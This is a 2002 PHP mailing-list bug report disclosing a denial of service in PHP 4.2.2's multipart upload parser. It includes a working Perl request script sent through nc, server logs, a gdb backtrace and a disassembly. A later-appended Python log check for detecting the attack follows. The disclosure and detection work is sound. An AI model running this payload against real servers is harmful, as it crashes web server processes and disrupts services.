>---------- Forwarded message ----------
>Date: Wed, 24 Jul 2002 16:12:06 -0400 (EDT)
>From: Dan Kalowsky <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Subject: Re: Bug #18547 Updated: Remote attacker can cause SIGSEGV
>
>Please send it to [EMAIL PROTECTED]
(Okay, that's easy enough -- I posted this in the web form, but it wrapped all to hell. Thanks for the email address, Mr. Kalowsky)

Hello. While working on an exploit for the multipart_buffer_headers() hole that you just fixed, I found another problem that you might want to look into. It looks like a DoS only, but there might be a way to execute arbitrary code and I just haven't found it yet. Credit for the find goes to myself and members of the [0dd] 0-Day Digest.

Thanks,
Thomas Cannon

---

[root@spoon]# /usr/local/www/bin/apachectl start
/usr/local/www/bin/apachectl start: httpd started
[root@spoon]# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 24 Jul 2002 04:03:49 GMT
Server: Apache/1.3.26 (Unix) PHP/4.2.2
X-Powered-By: PHP/4.2.2
Connection: close
Content-Type: text/html

Connection closed by foreign host.
[root@spoon]# /usr/local/www/bin/httpd -l
Compiled-in modules:
  http_core.c
  mod_env.c
  mod_log_config.c
  mod_mime.c
  mod_negotiation.c
  mod_status.c
  mod_include.c
  mod_autoindex.c
  mod_dir.c
  mod_cgi.c
  mod_asis.c
  mod_imap.c
  mod_actions.c
  mod_userdir.c
  mod_alias.c
  mod_access.c
  mod_auth.c
  mod_setenvif.c
  mod_php4.c
suexec: disabled; invalid wrapper /usr/local/www/bin/suexec
[root@spoon]#

/* change over to my remote machine, stereophonic */

[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[1] 90464
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[2] 90466
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[3] 90468
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[4] 90470
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[tcannon@stereophonic]$ more header.pl
#!/usr/bin/perl
# Writes one multipart/form-data POST whose declared Content-length (246) is
# larger than the body actually sent, so the rfc1867 parser on the server
# blocks in read() waiting for the rest until Apache's timeout alarm fires
# (see the backtrace below).
headers();

sub headers {
    print "POST /vuln/upload.php HTTP/1.0\n";
    print "Referer: http://www.noops.org\n";
    print "Connection: Keep-Alive\n";
    print "User-Agent: killer-loop.pl\n";
    print "Host: www.noops.org\n";
    print "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n";
    print "Accept-Encoding: gzip\n";
    print "Accept-Language: en\n";
    print "Accept-Charset: iso-8859-1,*,utf-8\n";
    print "Content-type: multipart/form-data; boundary=xnyLAaB03X\n";
    # end of headers, blank line, then two body bytes
    print "Content-length: 246\n\n\n\n";
    # one boundary and a form-data part whose field name is 100 'A's;
    # this is 152 of the declared 246 body bytes, the rest never arrive
    print "--xnyLAaB03X\n";
    print "Content-Disposition: form-data; name="."A" x 100;
}

/* then back to spoon, the webserver... The 'reviewer' script is a little thing I whipped up to keep a note of where I last read the apache_log and error_log from, and it also weeds out the code red and nimda background noise -- you'd see this same output from 'tail' or a similar utility */

/* NOTE: 5 - 10 minutes need to pass to give apache time to segfault */

[root@spoon]# reviewer
noops.org - - [23/Jul/2002:21:03:49 -0700] "HEAD / HTTP/1.0" 200 0 "-" "-"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:15 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"

Now it's the error log...

[Tue Jul 23 21:03:40 2002] [notice] Apache/1.3.26 (Unix) PHP/4.2.2 configured -- resuming normal operations
[Tue Jul 23 21:03:40 2002] [notice] Accept mutex: flock (Default: flock)
[Tue Jul 23 21:10:15 2002] [notice] child pid 31780 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:38 2002] [notice] child pid 31781 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:39 2002] [notice] child pid 31782 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:39 2002] [notice] child pid 31779 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:40 2002] [notice] child pid 31871 exit signal Segmentation fault (11)

[root@spoon]# gdb /usr/local/www/bin/httpd 32839
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
/usr/local/www/conf/32839: No such file or directory.
Attaching to program: /usr/local/www/bin/httpd, process 32839
Reading symbols from /usr/lib/libpam.so.1...done.
Reading symbols from /usr/lib/libcrypt.so.2...done.
Reading symbols from /usr/lib/libm.so.2...done.
Reading symbols from /usr/lib/libc.so.4...done.
Reading symbols from /usr/libexec/ld-elf.so.1...done.
0x28265794 in read () from /usr/lib/libc.so.4
(gdb) info stack
#0  0x28265794 in read () from /usr/lib/libc.so.4
#1  0x812002d in ap_read ()
#2  0x8121c41 in buff_read ()
#3  0x8121be7 in saferead_guts ()
#4  0x812064e in read_with_errors ()
#5  0x812087e in ap_bread ()
#6  0x81335ce in ap_get_client_block ()
#7  0x807a60a in sapi_apache_read_post ()
#8  0x8080576 in fill_buffer (self=0x823a30c) at rfc1867.c:178
#9  0x808072f in get_line (self=0x823a30c) at rfc1867.c:283
#10 0x808095d in multipart_buffer_headers (self=0x823a30c, header=0xbfbff5c4) at rfc1867.c:374
#11 0x8080fb5 in rfc1867_post_handler (content_type_dup=0x82055cc "multipart/form-data; boundary=xnyLAaB03X", arg=0x821f6ac) at rfc1867.c:663
#12 0x807f581 in sapi_handle_post (arg=0x821f6ac) at SAPI.c:110
#13 0x8082339 in php_treat_data (arg=0, str=0x0, destArray=0x0) at php_variables.c:251
#14 0x807d6df in php_hash_environment () at main.c:1149
#15 0x807ce33 in php_request_startup () at main.c:733
#16 0x8105bc2 in apache_php_module_main (r=0x8237034, display_source_mode=0) at sapi_apache.c:67
#17 0x807b02e in send_php ()
#18 0x807b082 in send_parsed_php ()
#19 0x8122665 in ap_invoke_handler ()
#20 0x8137928 in process_request_internal ()
#21 0x8137992 in ap_process_request ()
#22 0x812e487 in child_main ()
#23 0x812e710 in make_child ()
#24 0x812ea94 in perform_idle_server_maintenance ()
#25 0x812f011 in standalone_main ()
#26 0x812f654 in main ()
#27 0x8062e01 in _start ()
(gdb) n
Single stepping until exit from function read,
which has no line number information.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x28265794 in read () from /usr/lib/libc.so.4
(gdb) n
Single stepping until exit from function read,
which has no line number information.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x812b9dc in alrm_handler ()
(gdb) n
Single stepping until exit from function alrm_handler,
which has no line number information.

Program received signal SIGSEGV, Segmentation fault.
0x80f6b8c in _zval_ptr_dtor (zval_ptr=0x81c433c) at zend_execute_API.c:272
272     zend_execute_API.c: No such file or directory.
(gdb) info all-registers
eax            0x0              0
ecx            0x8              8
edx            0x1              1
ebx            0x81c433c        136069948
esp            0xbfbff6b8       0xbfbff6b8
ebp            0xbfbff6d0       0xbfbff6d0
esi            0x81c433c        136069948
edi            0x2              2
eip            0x80f6b8c        0x80f6b8c
eflags         0x10292          66194
cs             0x1f             31
ss             0x2f             47
ds             0x2f             47
es             0x2f             47
fs             0x2f             47
gs             0x2f             47
(gdb) disassemble 0x80f6b8c
Dump of assembler code for function _zval_ptr_dtor:
0x80f6b80 <_zval_ptr_dtor>:     pushl  %ebp
0x80f6b81 <_zval_ptr_dtor+1>:   movl   %esp,%ebp
0x80f6b83 <_zval_ptr_dtor+3>:   subl   $0x14,%esp
0x80f6b86 <_zval_ptr_dtor+6>:   pushl  %ebx
0x80f6b87 <_zval_ptr_dtor+7>:   movl   0x8(%ebp),%ebx
0x80f6b8a <_zval_ptr_dtor+10>:  movl   (%ebx),%eax
0x80f6b8c <_zval_ptr_dtor+12>:  decw   0xa(%eax)
0x80f6b90 <_zval_ptr_dtor+16>:  movl   (%ebx),%eax
0x80f6b92 <_zval_ptr_dtor+18>:  movzwl 0xa(%eax),%edx
0x80f6b96 <_zval_ptr_dtor+22>:  testw  %dx,%dx
0x80f6b99 <_zval_ptr_dtor+25>:  jne    0x80f6bbc <_zval_ptr_dtor+60>
0x80f6b9b <_zval_ptr_dtor+27>:  addl   $0xfffffff4,%esp
0x80f6b9e <_zval_ptr_dtor+30>:  pushl  %eax
0x80f6b9f <_zval_ptr_dtor+31>:  call   0x80fcf88 <_zval_dtor>
0x80f6ba4 <_zval_ptr_dtor+36>:  movl   (%ebx),%eax
0x80f6ba6 <_zval_ptr_dtor+38>:  addl   $0x10,%esp
0x80f6ba9 <_zval_ptr_dtor+41>:  cmpl   0x81c84d0,%eax
0x80f6baf <_zval_ptr_dtor+47>:  je     0x80f6bcc <_zval_ptr_dtor+76>
0x80f6bb1 <_zval_ptr_dtor+49>:  addl   $0xfffffff4,%esp
0x80f6bb4 <_zval_ptr_dtor+52>:  pushl  %eax
0x80f6bb5 <_zval_ptr_dtor+53>:  call   0x80f15d0 <_efree>
0x80f6bba <_zval_ptr_dtor+58>:  jmp    0x80f6bcc <_zval_ptr_dtor+76>
0x80f6bbc <_zval_ptr_dtor+60>:  cmpw   $0x1,%dx
0x80f6bc0 <_zval_ptr_dtor+64>:  jne    0x80f6bcc <_zval_ptr_dtor+76>
0x80f6bc2 <_zval_ptr_dtor+66>:  cmpb   $0x5,0x8(%eax)
0x80f6bc6 <_zval_ptr_dtor+70>:  je     0x80f6bcc <_zval_ptr_dtor+76>
0x80f6bc8 <_zval_ptr_dtor+72>:  movb   $0x0,0x9(%eax)
0x80f6bcc <_zval_ptr_dtor+76>:  movl   0xffffffe8(%ebp),%ebx
0x80f6bcf <_zval_ptr_dtor+79>:  leave
0x80f6bd0 <_zval_ptr_dtor+80>:  ret
End of assembler dump.

-- 
PHP Development Mailing List <http://www.php.net/>
To unsubscribe, visit: http://www.php.net/unsub.php
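A defender-side check for the symptom the report above documents, added here as an example and not part of the original post: it correlates error_log "exit signal Segmentation fault" lines with access_log POSTs that were logged with no response bytes ("-"), the pattern visible in the two logs, over constructed sample lines in the same formats. The 2-second matching window and the sample hosts are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines (not from the report) in the access_log / error_log
# formats shown there; both logs come from one host, so local times compare directly.
ACCESS_LOG = """\
noops.org - - [23/Jul/2002:21:03:49 -0700] "HEAD / HTTP/1.0" 200 0 "-" "-"
192.0.2.10 - - [23/Jul/2002:21:10:15 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "-" "killer-loop.pl"
192.0.2.10 - - [23/Jul/2002:21:10:38 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "-" "killer-loop.pl"
192.0.2.77 - - [23/Jul/2002:21:10:38 -0700] "GET /index.php HTTP/1.0" 200 318 "-" "Mozilla/4.0"
"""
ERROR_LOG = """\
[Tue Jul 23 21:03:40 2002] [notice] Apache/1.3.26 (Unix) PHP/4.2.2 configured -- resuming normal operations
[Tue Jul 23 21:10:15 2002] [notice] child pid 31780 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:38 2002] [notice] child pid 31781 exit signal Segmentation fault (11)
"""

ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\] ]+)[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+) "[^"]*" "([^"]*)"')
SEGV_RE = re.compile(r'^\[([^\]]+)\] \[notice\] child pid (\d+) exit signal Segmentation fault')

def parse_access(line):
    """Fields of a combined-format access_log line, or None if the line does not match."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    host, ts, method, path, status, size, agent = m.groups()
    return {"host": host, "when": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S"),
            "method": method, "path": path, "status": int(status), "size": size, "agent": agent}

def parse_segfault(line):
    """(time, child pid) for an error_log 'exit signal Segmentation fault' line, else None."""
    m = SEGV_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y"), int(m.group(2))

def correlate(access_text, error_text, window=timedelta(seconds=2)):
    """Pair each segfaulting child with a POST logged within `window` whose response
    size is '-': a request that hung in read() and died when the timeout fired."""
    suspects = [r for r in map(parse_access, access_text.splitlines())
                if r and r["method"] == "POST" and r["size"] == "-"]
    hits = []
    for when, pid in filter(None, map(parse_segfault, error_text.splitlines())):
        for r in suspects:
            if abs(r["when"] - when) <= window:
                hits.append((pid, r["host"], r["path"], r["agent"]))
    return hits
```

Run against live logs, a burst of hits from one host against one upload script is the signal to rate-limit that client and to lower Apache's Timeout until the fixed PHP is deployed.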